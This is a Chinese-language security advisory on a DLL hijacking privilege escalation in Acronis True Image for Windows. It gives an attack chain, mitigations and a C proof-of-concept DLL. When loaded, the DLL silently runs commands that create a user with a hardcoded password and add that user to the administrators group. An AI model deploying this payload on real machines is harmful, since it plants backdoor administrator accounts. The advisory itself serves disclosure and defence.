CVE-2026-28728 CVSS 6.7 中危

CVE-2026-28728 Acronis DLL劫持提权漏洞

披露日期: 2026-04-02

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-28728

漏洞类型

DLL劫持

CVSS评分

6.7 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Acronis True Image (Windows)

漏洞概述

Acronis True Image (Windows) 在 build 42902 之前的版本中存在一个严重的DLL劫持漏洞。该漏洞允许攻击者利用应用程序对动态链接库加载的不当处理，执行本地权限提升攻击。具体而言，由于程序在加载特定DLL时未严格验证文件路径或签名，攻击者可以将恶意DLL放置在预期路径中。当应用程序启动时，恶意代码将被执行，从而使攻击者获得系统级权限，严重威胁系统的机密性、完整性和可用性。

技术细节

该漏洞的技术核心在于Windows应用程序的DLL搜索顺序机制以及Acronis True Image未能安全地实施DLL加载策略。当应用程序尝试加载一个DLL时，Windows系统会按照特定的顺序搜索目录（如应用程序目录、系统目录、当前工作目录等）。如果Acronis True Image在加载过程中优先检查了当前工作目录或其他非受信路径，且该路径可被低权限用户写入，攻击者即可在此放置一个恶意的同名DLL。一旦用户或系统服务触发该应用的运行，恶意DLL将被加载并执行其导出函数或DllMain入口代码。由于Acronis True Image通常以SYSTEM或管理员权限运行，注入的代码将继承这些高权限，从而允许攻击者执行任意系统命令、创建管理员账户或关闭安全防护，实现从低权限用户到SYSTEM权限的跨越。

攻击链分析

STEP 1

侦察与准备

攻击者确认受影响的Acronis True Image版本及其加载的DLL列表。

STEP 2

植入恶意载荷

攻击者制作恶意DLL文件，并将其放置在应用程序可写的目录（如当前工作目录）中。

STEP 3

触发漏洞

诱导用户或等待系统服务自动启动Acronis True Image程序。

STEP 4

执行提权

应用程序加载恶意DLL并执行其中的恶意代码，获取高权限系统访问。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <windows.h>

// Proof of Concept for DLL Hijacking
// This DLL demonstrates code execution upon being loaded by the vulnerable application.

// Exported function expected by the vulnerable application
__declspec(dllexport) void VulnerableFunction() {
    // Placeholder for the original function logic
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    switch (ul_reason_for_call) {
        case DLL_PROCESS_ATTACH:
            // Code to run when the DLL is loaded into the process
            // Example: Adding a user to demonstrate privilege escalation
            WinExec("cmd.exe /c net user poc_user P@ssw0rd /add", SW_HIDE);
            WinExec("cmd.exe /c net localgroup administrators poc_user /add", SW_HIDE);
            break;
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
            break;
    }
    return TRUE;
}

影响范围

Acronis True Image (Windows) < build 42902

防御指南

临时缓解措施

在应用官方补丁之前，建议用户严格限制对Acronis True Image安装目录及相关子目录的写入权限，确保普通用户无法在此类目录下创建或修改文件。此外，应避免从不可信的目录路径启动Acronis True Image程序，并利用终端防护软件监控可疑的进程注入和异常的DLL加载行为，以降低被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表